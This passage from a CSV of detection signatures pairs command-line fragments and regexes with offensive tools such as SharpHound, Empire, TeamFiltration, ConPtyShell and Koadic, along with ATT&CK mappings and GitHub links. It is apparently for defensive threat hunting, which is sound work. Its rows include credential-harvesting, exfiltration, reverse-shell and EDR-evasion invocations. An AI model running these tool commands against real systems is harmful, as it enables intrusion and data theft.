TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "* COFFLoader.exe*",".{0,1000}\sCOFFLoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "* collect activedirectory --*",".{0,1000}\scollect\sactivedirectory\s\-\-.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "* --collectallproperties*",".{0,1000}\s\-\-collectallproperties.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --CollectionMethod All *ldap*",".{0,1000}\s\-\-CollectionMethod\sAll\s.{0,1000}ldap.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --CollectionMethod All *--ZipFileName 
*.zip*",".{0,1000}\s\-\-CollectionMethod\sAll\s.{0,1000}\-\-ZipFileName\s.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* -CollectionMethod All*loggedon*",".{0,1000}\s\-CollectionMethod\sAll.{0,1000}loggedon.{0,1000}","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "* -CollectionMethod LoggedOn -Verbose*",".{0,1000}\s\-CollectionMethod\sLoggedOn\s\-Verbose.{0,1000}","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "* -CollectionMethod stealth*",".{0,1000}\s\-CollectionMethod\sstealth.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --collectionmethods ACL*",".{0,1000}\s\-\-collectionmethods\sACL.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods ComputerOnly*",".{0,1000}\s\-\-collectionmethods\sComputerOnly.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* 
--collectionmethods Container*",".{0,1000}\s\-\-collectionmethods\sContainer.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods DCOM",".{0,1000}\s\-\-collectionmethods\sDCOM","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods DCOnly*",".{0,1000}\s\-\-collectionmethods\sDCOnly.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods GPOLocalGroup*",".{0,1000}\s\-\-collectionmethods\sGPOLocalGroup.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods Group*",".{0,1000}\s\-\-collectionmethods\sGroup.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods LocalGroup*",".{0,1000}\s\-\-collectionmethods\sLocalGroup.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - 
T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods LoggedOn*",".{0,1000}\s\-\-collectionmethods\sLoggedOn.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods ObjectProps*",".{0,1000}\s\-\-collectionmethods\sObjectProps.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods PSRemote*",".{0,1000}\s\-\-collectionmethods\sPSRemote.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods RDP*",".{0,1000}\s\-\-collectionmethods\sRDP.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods Session*",".{0,1000}\s\-\-collectionmethods\sSession.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods Trusts*",".{0,1000}\s\-\-collectionmethods\sTrusts.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* com.blackh4t*",".{0,1000}\scom\.blackh4t.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "* COMHijackToolkit.ps1*",".{0,1000}\sCOMHijackToolkit\.ps1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - 
TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "* --command * --output payload*",".{0,1000}\s\-\-command\s.{0,1000}\s\-\-output\spayload.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "* -command *.exe* -technique ccmstp*",".{0,1000}\s\-command\s.{0,1000}\.exe.{0,1000}\s\-technique\sccmstp.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "* command_exec.exe*",".{0,1000}\scommand_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* common_pass.txt*",".{0,1000}\scommon_pass\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* 
ComputerDefaults.exe*",".{0,1000}\sComputerDefaults\.exe.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "* -ComputerName -ServiceEXE *",".{0,1000}\s\-ComputerName\s\-ServiceEXE\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PsExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* ComunicationC2.cpp*",".{0,1000}\sComunicationC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "* --config * --just-clean --cleaning-file *",".{0,1000}\s\-\-config\s.{0,1000}\s\-\-just\-clean\s\-\-cleaning\-file\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege 
Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "* --config *.json --debug --exfil --onedrive*",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-debug\s\-\-exfil\s\-\-onedrive.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --config *.json --enum --validate-msol --usernames *",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-enum\s\-\-validate\-msol\s\-\-usernames\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --config *.json --enum --validate-teams*",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-enum\s\-\-validate\-teams.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --config *.json --exfil --aad*",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-exfil\s\-\-aad.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring 
O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* -config modlishka.json *",".{0,1000}\s\-config\smodlishka\.json\s.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "* configdhcpserver.sh*",".{0,1000}\sconfigdhcpserver\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "* Configure-Victim.ps1*",".{0,1000}\sConfigure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Configuring Windows Firewall rules to block EDR network 
access*",".{0,1000}\sConfiguring\sWindows\sFirewall\srules\sto\sblock\sEDR\snetwork\saccess.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "* ConfuserEx.exe*",".{0,1000}\sConfuserEx\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "* --connection-min-idle * ws://*",".{0,1000}\s\-\-connection\-min\-idle\s.{0,1000}\sws\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* ConPtyShell*",".{0,1000}\sConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "* -consoleoutput -browsercredentials*",".{0,1000}\s\-consoleoutput\s\-browsercredentials.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "* -consoleoutput -DomainRecon*",".{0,1000}\s\-consoleoutput\s\-DomainRecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "* -consoleoutput -Localrecon*",".{0,1000}\s\-consoleoutput\s\-Localrecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "* -ConType bind *",".{0,1000}\s\-ConType\sbind\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -ConType reverse *",".{0,1000}\s\-ConType\sreverse\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --convert_idrsa_pub --publickey $HOME/.ssh/id_rsa.pub*",".{0,1000}\s\-\-convert_idrsa_pub\s\-\-publickey\s\$HOME\/\.ssh\/id_rsa\.pub.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --copy-file --source-file *.docx --target-file *.docx --target-volume 
*",".{0,1000}\s\-\-copy\-file\s\-\-source\-file\s.{0,1000}\.docx\s\-\-target\-file\s.{0,1000}\.docx\s\-\-target\-volume\s.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "* core.payload *",".{0,1000}\score\.payload\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 